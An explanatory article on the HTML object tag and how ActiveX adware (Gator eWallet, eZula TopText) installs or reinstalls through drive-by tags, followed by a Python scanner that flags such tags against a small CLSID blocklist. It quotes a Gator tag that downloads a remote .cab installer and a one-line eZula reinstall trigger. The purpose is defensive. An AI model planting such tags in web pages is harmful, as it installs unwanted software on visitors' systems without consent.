The Object Tag

The object tag is typically used to display multimedia content on the web for which the browser may need additional software to operate within the browser itself (browser plug-ins or helper applications). The object tag is part of standard HTML and can be used to insert an object into a web page. The object will most likely be an ActiveX component, an applet, an image map or some kind of media player. An object tag may contain a classid attribute, which identifies the program on your system that handles the object. It may also contain a codebase attribute, which tells the browser where to download the program needed for this plug-in if it is not found on the system. The example below shows how Gator eWallet installs using an ActiveX object:

<object id="IEGator"
        classid="CLSID:54e7e082-1da6-412e-96b5-c290fcef5329"
        codebase="http://www.gator.com/download/2500/iegator_4032_gatorsetup.cab"
        align="baseline"
        border="0"
        width="400"
        height="20">
  <param name="params"
         value="fcn=setup&src=www.gator.com/download/2500/setup.ex_
&pidel=this&bgcolor=E8F1D0&aic=",aicStr,"&">
  <!-- the ",aicStr," fragment above is left over from the JavaScript string that wrote this tag; the value is filled in at run time -->
  <!-- fallback content, shown only if the control cannot be loaded -->
  <font face="verdana,arial,helvetica" size="-1"><i>Gator Setup failed to start</i></font>
  <img src="http://images.gator.com/global/spacer.gif"
       width="1" height="1" border="0" alt="" onLoad="checkPlugin( )">
</object>

This is the way most drive-by ActiveX hijackers install themselves. The CLSID value identifies a component registered on the system; here it resolves to the .dll file that runs Gator every time Internet Explorer is loaded. If that component is not present, the codebase attribute tells the browser to download a .cab (cabinet file) directly from the Gator server. A cabinet file (developed by Microsoft) is an archive file which uses compression to group together one or many files, much like a zip file.

Problems with Objects

Many spyware components that I've seen are quite smart when it comes to uninstalling. Many spyware programs do appear to remove themselves fully, but under close inspection many leave traces in the registry, and some leave CLSID values. As an example I'm going to use eZula TopText, which left a CLSID value after I uninstalled it. This Class ID linked to a file called ezstub.exe, which automatically sets up eZula TopText again. Any web page could use the code shown below to reinstall eZula onto my system:

<object classid='clsid:C03351A4-6755-11D4-8A73-0050DA2EE1BE'></object>

This is enough to execute the file ezstub.exe. It works because Internet Explorer treats ezstub as a plug-in of some sort. You can address this problem by turning off plug-ins in Internet Explorer, or by making sure that unwanted CLSID values are not left in the registry.
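As an added example (not code from the original page), the following Python scanner pulls every object tag out of a page and flags the two patterns described above: a codebase that downloads a remote .cab, and a bare classid that relies on a component already registered on the machine. The CLSID table holds only the two values quoted in this article, and the sample HTML is constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# CLSIDs quoted in this article (Gator eWallet, eZula TopText); a real scanner would load this from a blocklist.
KNOWN_BAD_CLSIDS = {
    "54E7E082-1DA6-412E-96B5-C290FCEF5329": "Gator eWallet",
    "C03351A4-6755-11D4-8A73-0050DA2EE1BE": "eZula TopText",
}

def normalize_clsid(value):
    # Strip the "clsid:" prefix and any braces, upper-case the hex digits.
    v = value.strip()
    if v.lower().startswith("clsid:"):
        v = v[len("clsid:"):]
    return v.strip("{}").upper()

class ObjectTagScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []   # one dict per <object> tag, in page order

    def handle_starttag(self, tag, attrs):
        if tag != "object":
            return
        a = {k: (v or "") for k, v in attrs}   # HTMLParser lower-cases attribute names
        clsid = normalize_clsid(a["classid"]) if "classid" in a else None
        codebase = a.get("codebase") or None
        reasons = []
        if clsid in KNOWN_BAD_CLSIDS:
            reasons.append("known adware CLSID: " + KNOWN_BAD_CLSIDS[clsid])
        if codebase:
            host = urlparse(codebase).netloc
            if host:
                reasons.append("remote codebase download from " + host)
            if codebase.lower().endswith(".cab"):
                reasons.append("codebase points at a .cab installer")
        if clsid and not codebase:
            # The eZula case: nothing is downloaded, the tag just runs whatever is still registered.
            reasons.append("classid without codebase: runs an already-registered component")
        self.findings.append({"clsid": clsid, "codebase": codebase, "reasons": reasons})

def scan_html(html):
    scanner = ObjectTagScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample page: the two snippets from the article plus one benign object.
SAMPLE_HTML = """<object id="IEGator" classid="CLSID:54e7e082-1da6-412e-96b5-c290fcef5329"
  codebase="http://www.gator.com/download/2500/iegator_4032_gatorsetup.cab"></object>
<object classid='clsid:C03351A4-6755-11D4-8A73-0050DA2EE1BE'></object>
<object data="intro.swf" type="application/x-shockwave-flash"></object>"""
```

Calling `scan_html(SAMPLE_HTML)` returns three findings: the Gator tag with three reasons, the eZula tag with two, and the Flash object with none.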